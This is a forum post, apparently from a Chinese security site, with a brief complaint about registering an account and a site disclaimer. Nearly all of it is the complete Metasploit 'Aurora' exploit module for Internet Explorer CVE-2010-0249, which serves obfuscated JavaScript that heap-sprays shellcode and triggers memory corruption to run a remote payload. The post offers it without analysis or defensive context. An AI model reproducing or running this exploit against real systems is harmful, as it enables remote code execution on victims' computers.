
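Feeling down lately

Even registering an account came with a lot of problems. I registered the first one, but the email never arrived, and it stayed stuck at pending verification.
Now I finally have a proper account.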

 

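非安全中国网 disclaimer:
1. All statements and images in this post are solely the personal opinion of the poster and do not represent the position of this site;
2. This topic was posted by pcarm. The poster, pcarm, complies with the six management rules of the "Copyright and Disclaimer Statement" (《关于版权及免责声明》) and enjoys the related rights;
3. Other organizations or individuals must obtain the consent of the poster, pcarm, and of this site before using, reposting, or quoting this post;
4. Some works in this post are reposted from other media and published on this site; the purpose of reposting is to convey more information, and it does not mean that this site endorses their views or is responsible for their authenticity;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.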

Internet-Explorer-CVE-2010-0249-DOC
Internet Explorer CVE-2010-0249 Remote Code Execution Vulnerability

```ruby
##
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :vuln_test  => nil, # no way to test without just trying it
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
      'Description'    => %q{
          This module exploits a memory corruption flaw in Internet Explorer. This
        flaw was found in the wild.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'unknown',
          'hdm'      # Metasploit port
        ],
      'Version'        => '$Revision: 8136 $',
      'References'     =>
        [
          ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
          ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "x00",
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => 'Jan 14 2009', # wepawet sample
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)

    if (request.uri.match(/.gif/i))
      data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
      send_response(cli, data, { 'Content-Type' => 'image/gif' })
      return
    end

    var_memory    = rand_text_alpha(rand(100) + 1)
    var_boom      = rand_text_alpha(rand(100) + 1)
    var_x1        = rand_text_alpha(rand(100) + 1)
    var_e1        = rand_text_alpha(rand(100) + 1)
    var_e2        = rand_text_alpha(rand(100) + 1)

    var_comment   = rand_text_alpha(rand(100) + 1);
    var_abc       = rand_text_alpha(3);

    var_ev1       = rand_text_alpha(rand(100) + 1)
    var_ev2       = rand_text_alpha(rand(100) + 1)
    var_sp1       = rand_text_alpha(rand(100) + 1)

    var_unescape  = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)
    var_spray     = rand_text_alpha(rand(100) + 1)
    var_start     = rand_text_alpha(rand(100) + 1)
    var_i         = rand_text_alpha(rand(100) + 1)

    rand_html     = rand_text_english(rand(400) + 500)

    html = %Q|<html>
<head>
<script>
var #{var_comment} = "COMMENT";
var #{var_x1} = new Array();
for (i = 0; i < 200; i ++ ){
  #{var_x1} = document.createElement(#{var_comment});
  #{var_x1}.data = "#{var_abc}";
};
var #{var_e1} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}() {
  var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
  var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
  do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
  for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_ev1}(evt){
  #{var_boom}();
  #{var_e1} = document.createEventObject(evt);
  document.getElementById("#{var_sp1}").innerHTML = "";
  window.setInterval(#{var_ev2}, 50);
}
function #{var_ev2}(){
  p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i < #{var_x1}.length; i ++ ){
    #{var_x1}.data = p;
  }
  var t = #{var_e1}.srcElement;
}
</script>
</head>
<body>
<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>
</body>
</html>
    |

    # Transmit the compressed response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end

end
```

















